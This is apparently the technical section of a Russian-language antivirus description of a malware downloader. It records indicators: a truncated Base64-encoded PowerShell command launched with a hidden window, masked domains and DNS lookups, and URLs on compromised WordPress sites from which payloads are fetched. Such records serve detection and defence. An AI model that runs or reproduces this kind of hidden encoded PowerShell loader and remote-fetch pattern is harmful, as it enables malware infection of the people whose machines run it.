Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABwAHQAUABRAGgATwB3AD0AJwBEAHEAYgBxADcAWQB6ACcAOwAkAFAAWgBaAHAAaQBEAE0AIAA9ACAAJwA0ADcAMAAnADsAJABMAE0ASwBFAG4ATgA5AEEAPQAnAGwAbgBOAFAAdQA3AEwAJwA7ACQAdgBpAGwANQBKAHEAPQAkAGUAbgB2ADoAdQ...
- 'am####ndangela.com':80
- 'ha#####odinjapan.com':80
- 'ha#####odinjapan.com':443
- 'x.##2.us':80
- 'ma######nphonesystem.com':80
- http://am####ndangela.com/wp-includes/Requests/Utility/BUKTLSjxp/
- http://ha#####odinjapan.com/wp-content/nYsWtkihe/
- http://x.##2.us/x.cer
- http://ma######nphonesystem.com/wp-admin/qp813_dj0y8-2/
- 'ha#####odinjapan.com':443
- DNS ASK am####ndangela.com
- DNS ASK ha#####odinjapan.com
- DNS ASK x.##2.us
- DNS ASK wo###zie.com
- DNS ASK ma######nphonesystem.com
- DNS ASK uk##k.co.id
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABwAHQAUABRAGgATwB3AD0AJwBEAHEAYgBxADcAWQB6ACcAOwAkAFAAWgBaAHAAaQBEAE0AIAA9ACAAJwA0ADcAMAAnADsAJABMAE0ASwBFAG4ATgA5AEEAPQAnAGwAbgBOAFAAdQA3AEwAJwA7ACQAdgBpAGwANQBKAHEAPQAkAGUAbgB2ADoAdQ...' (со скрытым окном)